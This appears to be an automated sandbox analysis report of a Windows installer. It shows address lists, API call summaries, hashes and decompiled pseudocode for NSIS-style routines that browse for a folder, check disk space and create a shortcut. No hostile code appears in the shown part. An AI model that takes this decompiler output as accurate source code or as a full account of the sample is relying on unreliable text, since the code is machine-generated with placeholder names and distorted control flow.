                                                                                                                                                                                                          0x004056d7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040569b
                                                                                                                                                                                                          0x0040569b
                                                                                                                                                                                                          0x004056a1
                                                                                                                                                                                                          0x004056dc
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004056e3
                                                                                                                                                                                                          0x004056aa
                                                                                                                                                                                                          0x004056b1
                                                                                                                                                                                                          0x004056b6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004056b6
                                                                                                                                                                                                          0x00405699
                                                                                                                                                                                                          0x004054d4
                                                                                                                                                                                                          0x004054d8
                                                                                                                                                                                                          0x004054e0
                                                                                                                                                                                                          0x004054e4
                                                                                                                                                                                                          0x004054e7
                                                                                                                                                                                                          0x004054ea
                                                                                                                                                                                                          0x004054ed
                                                                                                                                                                                                          0x004054f0
                                                                                                                                                                                                          0x004054f1
                                                                                                                                                                                                          0x004054f2
                                                                                                                                                                                                          0x0040550b
                                                                                                                                                                                                          0x0040550e
                                                                                                                                                                                                          0x00405518
                                                                                                                                                                                                          0x00405527
                                                                                                                                                                                                          0x0040552f
                                                                                                                                                                                                          0x00405537
                                                                                                                                                                                                          0x0040553c
                                                                                                                                                                                                          0x0040553f
                                                                                                                                                                                                          0x0040554b
                                                                                                                                                                                                          0x00405554
                                                                                                                                                                                                          0x0040555d
                                                                                                                                                                                                          0x0040557f
                                                                                                                                                                                                          0x00405585
                                                                                                                                                                                                          0x00405596
                                                                                                                                                                                                          0x0040559b
                                                                                                                                                                                                          0x004055a9
                                                                                                                                                                                                          0x004055b7
                                                                                                                                                                                                          0x004055b7
                                                                                                                                                                                                          0x004055bc
                                                                                                                                                                                                          0x004055ca
                                                                                                                                                                                                          0x004055ca
                                                                                                                                                                                                          0x004055cf
                                                                                                                                                                                                          0x004055d2
                                                                                                                                                                                                          0x004055d7
                                                                                                                                                                                                          0x004055e3
                                                                                                                                                                                                          0x004055ec
                                                                                                                                                                                                          0x004055f9
                                                                                                                                                                                                          0x00405608
                                                                                                                                                                                                          0x004055fb
                                                                                                                                                                                                          0x00405600
                                                                                                                                                                                                          0x00405600
                                                                                                                                                                                                          0x00405614
                                                                                                                                                                                                          0x00405614
                                                                                                                                                                                                          0x00405628
                                                                                                                                                                                                          0x00405631
                                                                                                                                                                                                          0x0040563a
                                                                                                                                                                                                          0x0040564a
                                                                                                                                                                                                          0x00405656
                                                                                                                                                                                                          0x00405656
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405511
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405520
                                                                                                                                                                                                          • GetClientRect.USER32 ref: 0040555D
                                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00405564
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405585
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405596
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 004055A9
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 004055B7
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 004055CA
                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 004055EC
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405600
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405631
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0040564A
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405656
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040552F
                                                                                                                                                                                                            • Part of subcall function 00404306: SendMessageA.USER32 ref: 00404314
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405672
                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005446,00000000), ref: 00405680
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405687
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004056AA
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004056B1
                                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 004056F7
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0040572B
                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 0040573C
                                                                                                                                                                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405751
                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00405771
                                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 004057C6
                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004057D6
                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004057DC
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 004057E5
                                                                                                                                                                                                          • GlobalLock.KERNEL32 ref: 004057EF
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405803
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040581C
                                                                                                                                                                                                          • SetClipboardData.USER32 ref: 00405827
                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040582D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 590372296-0
                                                                                                                                                                                                          • Opcode ID: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
                                                                                                                                                                                                          • Instruction ID: 3d94e6139f86797c0ae92d92c46aaabaef2c33f238587a010477577dd15b8479
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BA17C71900608BFDB11AFA1DE45EAE3B79FB08354F40443AFA45B61A0CB754E51DF68
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00404763, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                                          			E00404763(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a090;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040594D(0x3fb, _t146);
					E00406528(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040594D(0x3fb, _t146);
							if(E00405CD3(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E0040624D(0x429888, _t146);
							_t87 = E00406656(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040624D(0x429888, _t146);
								_t89 = E00405C7E(0x429888);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429888,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429888) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429888,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C2C(0x429888);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429888) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BF7(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ec1c; // 0x590f48
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BDF(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429878);
									} else {
										E00404B1A(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f504 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042F3(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a8a8 == _t158) {
									E004046BC();
								}
								 *0x42a8a8 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a8b8;
							_v60 = E00404AB4;
							_v56 = _t146;
							_v68 = E004062E0(_t146, 0x42a8b8, _t166, 0x429c90, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BE5(_t146);
								_t125 =  *((intOrPtr*)( *0x42f454 + 0x11c));
								if( *((intOrPtr*)( *0x42f454 + 0x11c)) != 0 && _t146 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
									E004062E0(_t146, 0x42a8b8, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3e0, 0x42a8b8) != 0) {
										lstrcatA(_t146, 0x42e3e0);
									}
								}
								 *0x42a8a8 =  *0x42a8a8 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C52(_t146) != 0 && E00405C7E(_t146) == 0) {
						E00405BE5(_t146);
					}
					 *0x42ec18 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042D1(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042D1(_t166);
					E00404306(_t165);
					_t138 = E00406656(8);
					if(_t138 == 0) {
						L53:
						return E00404338(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                                                                                                                                                                          0x00404763
                                                                                                                                                                                                          0x00404769
                                                                                                                                                                                                          0x0040476f
                                                                                                                                                                                                          0x0040477c
                                                                                                                                                                                                          0x0040478a
                                                                                                                                                                                                          0x0040478d
                                                                                                                                                                                                          0x00404795
                                                                                                                                                                                                          0x0040479b
                                                                                                                                                                                                          0x0040479b
                                                                                                                                                                                                          0x004047a7
                                                                                                                                                                                                          0x004047aa
                                                                                                                                                                                                          0x00404818
                                                                                                                                                                                                          0x0040481f
                                                                                                                                                                                                          0x004048f6
                                                                                                                                                                                                          0x004048fd
                                                                                                                                                                                                          0x0040490c
                                                                                                                                                                                                          0x0040490c
                                                                                                                                                                                                          0x00404910
                                                                                                                                                                                                          0x0040491a
                                                                                                                                                                                                          0x00404927
                                                                                                                                                                                                          0x00404929
                                                                                                                                                                                                          0x00404929
                                                                                                                                                                                                          0x00404937
                                                                                                                                                                                                          0x0040493e
                                                                                                                                                                                                          0x00404945
                                                                                                                                                                                                          0x00404948
                                                                                                                                                                                                          0x0040497f
                                                                                                                                                                                                          0x00404981
                                                                                                                                                                                                          0x00404987
                                                                                                                                                                                                          0x0040498c
                                                                                                                                                                                                          0x00404990
                                                                                                                                                                                                          0x00404992
                                                                                                                                                                                                          0x00404992
                                                                                                                                                                                                          0x004049ae
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004049b0
                                                                                                                                                                                                          0x004049b3
                                                                                                                                                                                                          0x004049c1
                                                                                                                                                                                                          0x004049c7
                                                                                                                                                                                                          0x004049c8
                                                                                                                                                                                                          0x004049cb
                                                                                                                                                                                                          0x004049ce
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004049ce
                                                                                                                                                                                                          0x0040494a
                                                                                                                                                                                                          0x0040494c
                                                                                                                                                                                                          0x00404950
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404952
                                                                                                                                                                                                          0x00404952
                                                                                                                                                                                                          0x0040495f
                                                                                                                                                                                                          0x00404964
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404968
                                                                                                                                                                                                          0x0040496a
                                                                                                                                                                                                          0x0040496a
                                                                                                                                                                                                          0x00404972
                                                                                                                                                                                                          0x00404974
                                                                                                                                                                                                          0x00404977
                                                                                                                                                                                                          0x0040497a
                                                                                                                                                                                                          0x0040497d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040497d
                                                                                                                                                                                                          0x004049da
                                                                                                                                                                                                          0x004049e4
                                                                                                                                                                                                          0x004049e7
                                                                                                                                                                                                          0x004049ea
                                                                                                                                                                                                          0x004049f1
                                                                                                                                                                                                          0x004049f1
                                                                                                                                                                                                          0x004049f3
                                                                                                                                                                                                          0x004049f3
                                                                                                                                                                                                          0x004049f8
                                                                                                                                                                                                          0x004049fa
                                                                                                                                                                                                          0x00404a02
                                                                                                                                                                                                          0x00404a09
                                                                                                                                                                                                          0x00404a0b
                                                                                                                                                                                                          0x00404a16
                                                                                                                                                                                                          0x00404a16
                                                                                                                                                                                                          0x00404a0b
                                                                                                                                                                                                          0x00404a1d
                                                                                                                                                                                                          0x00404a26
                                                                                                                                                                                                          0x00404a30
                                                                                                                                                                                                          0x00404a38
                                                                                                                                                                                                          0x00404a53
                                                                                                                                                                                                          0x00404a3a
                                                                                                                                                                                                          0x00404a43
                                                                                                                                                                                                          0x00404a43
                                                                                                                                                                                                          0x00404a38
                                                                                                                                                                                                          0x00404a58
                                                                                                                                                                                                          0x00404a5d
                                                                                                                                                                                                          0x00404a62
                                                                                                                                                                                                          0x00404a6b
                                                                                                                                                                                                          0x00404a6b
                                                                                                                                                                                                          0x00404a74
                                                                                                                                                                                                          0x00404a76
                                                                                                                                                                                                          0x00404a76
                                                                                                                                                                                                          0x00404a82
                                                                                                                                                                                                          0x00404a8a
                                                                                                                                                                                                          0x00404a94
                                                                                                                                                                                                          0x00404a94
                                                                                                                                                                                                          0x00404a99
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404a99
                                                                                                                                                                                                          0x00404948
                                                                                                                                                                                                          0x004048ff
                                                                                                                                                                                                          0x00404906
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404906
                                                                                                                                                                                                          0x00404825
                                                                                                                                                                                                          0x0040482e
                                                                                                                                                                                                          0x00404848
                                                                                                                                                                                                          0x0040484d
                                                                                                                                                                                                          0x00404857
                                                                                                                                                                                                          0x0040485e
                                                                                                                                                                                                          0x0040486a
                                                                                                                                                                                                          0x0040486d
                                                                                                                                                                                                          0x00404870
                                                                                                                                                                                                          0x00404877
                                                                                                                                                                                                          0x0040487f
                                                                                                                                                                                                          0x00404882
                                                                                                                                                                                                          0x00404886
                                                                                                                                                                                                          0x0040488d
                                                                                                                                                                                                          0x00404895
                                                                                                                                                                                                          0x004048ef
                                                                                                                                                                                                          0x00404897
                                                                                                                                                                                                          0x00404898
                                                                                                                                                                                                          0x0040489f
                                                                                                                                                                                                          0x004048a9
                                                                                                                                                                                                          0x004048b1
                                                                                                                                                                                                          0x004048be
                                                                                                                                                                                                          0x004048d2
                                                                                                                                                                                                          0x004048d6
                                                                                                                                                                                                          0x004048d6
                                                                                                                                                                                                          0x004048d2
                                                                                                                                                                                                          0x004048db
                                                                                                                                                                                                          0x004048e8
                                                                                                                                                                                                          0x004048e8
                                                                                                                                                                                                          0x00404895
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040484d
                                                                                                                                                                                                          0x0040483b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404841
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004047ac
                                                                                                                                                                                                          0x004047b9
                                                                                                                                                                                                          0x004047c2
                                                                                                                                                                                                          0x004047cf
                                                                                                                                                                                                          0x004047cf
                                                                                                                                                                                                          0x004047d6
                                                                                                                                                                                                          0x004047dc
                                                                                                                                                                                                          0x004047e5
                                                                                                                                                                                                          0x004047e8
                                                                                                                                                                                                          0x004047eb
                                                                                                                                                                                                          0x004047f3
                                                                                                                                                                                                          0x004047f6
                                                                                                                                                                                                          0x004047f9
                                                                                                                                                                                                          0x004047ff
                                                                                                                                                                                                          0x00404806
                                                                                                                                                                                                          0x0040480d
                                                                                                                                                                                                          0x00404a9f
                                                                                                                                                                                                          0x00404ab1
                                                                                                                                                                                                          0x00404813
                                                                                                                                                                                                          0x00404816
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404816
                                                                                                                                                                                                          0x0040480d

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 004047B2
                                                                                                                                                                                                          • SetWindowTextA.USER32(00000000,?), ref: 004047DC
                                                                                                                                                                                                          • SHBrowseForFolderA.SHELL32(?,00429C90,?), ref: 0040488D
                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404898
                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(Call,0042A8B8,00000000,?,?), ref: 004048CA
                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,Call), ref: 004048D6
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004048E8
                                                                                                                                                                                                            • Part of subcall function 0040594D: GetDlgItemTextA.USER32 ref: 00405960
                                                                                                                                                                                                            • Part of subcall function 00406528: CharNextA.USER32(?), ref: 00406580
                                                                                                                                                                                                            • Part of subcall function 00406528: CharNextA.USER32(?), ref: 0040658D
                                                                                                                                                                                                            • Part of subcall function 00406528: CharNextA.USER32(?), ref: 00406592
                                                                                                                                                                                                            • Part of subcall function 00406528: CharPrevA.USER32(?,?), ref: 004065A2
                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(00429888,?,?,0000040F,?,00429888,00429888,?,00000001,00429888,?,?,000003FB,?), ref: 004049A6
                                                                                                                                                                                                          • MulDiv.KERNEL32 ref: 004049C1
                                                                                                                                                                                                            • Part of subcall function 00404B1A: lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                                                                                                                                                            • Part of subcall function 00404B1A: wsprintfA.USER32 ref: 00404BC0
                                                                                                                                                                                                            • Part of subcall function 00404B1A: SetDlgItemTextA.USER32(?,0042A8B8), ref: 00404BD3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                          • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                                                                                                                          • API String ID: 2624150263-350584602
                                                                                                                                                                                                          • Opcode ID: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                                                                                                                                                          • Instruction ID: b89c9f0b9ad2a5e463b1d4baa2297f7fe0657747611b748bc5d4715ca5df860c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79c2b04a4b296fc05e45a035d0f819eda2b2c317a157a3b831c209e23d1f951a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9A17DB1A00209ABDB11AFA5C941AAF77B8EF84314F14843BF601B62D1DB7C99518F6D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                                          			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C52( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Albus\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                                                                                                                                                                          0x00402174
                                                                                                                                                                                                          0x0040217e
                                                                                                                                                                                                          0x00402188
                                                                                                                                                                                                          0x00402195
                                                                                                                                                                                                          0x004021a0
                                                                                                                                                                                                          0x004021a3
                                                                                                                                                                                                          0x004021bd
                                                                                                                                                                                                          0x004021c3
                                                                                                                                                                                                          0x004021c9
                                                                                                                                                                                                          0x004021cc
                                                                                                                                                                                                          0x004021d6
                                                                                                                                                                                                          0x004021da
                                                                                                                                                                                                          0x004021da
                                                                                                                                                                                                          0x004021df
                                                                                                                                                                                                          0x004021f0
                                                                                                                                                                                                          0x004021f8
                                                                                                                                                                                                          0x004022d4
                                                                                                                                                                                                          0x004022d4
                                                                                                                                                                                                          0x004022db
                                                                                                                                                                                                          0x004021fe
                                                                                                                                                                                                          0x004021fe
                                                                                                                                                                                                          0x0040220d
                                                                                                                                                                                                          0x00402211
                                                                                                                                                                                                          0x00402214
                                                                                                                                                                                                          0x0040221a
                                                                                                                                                                                                          0x00402228
                                                                                                                                                                                                          0x0040222b
                                                                                                                                                                                                          0x0040222d
                                                                                                                                                                                                          0x00402238
                                                                                                                                                                                                          0x00402238
                                                                                                                                                                                                          0x0040223d
                                                                                                                                                                                                          0x0040223f
                                                                                                                                                                                                          0x00402246
                                                                                                                                                                                                          0x00402246
                                                                                                                                                                                                          0x00402249
                                                                                                                                                                                                          0x00402252
                                                                                                                                                                                                          0x00402255
                                                                                                                                                                                                          0x0040225a
                                                                                                                                                                                                          0x0040225c
                                                                                                                                                                                                          0x00402269
                                                                                                                                                                                                          0x00402269
                                                                                                                                                                                                          0x0040226c
                                                                                                                                                                                                          0x00402278
                                                                                                                                                                                                          0x0040227b
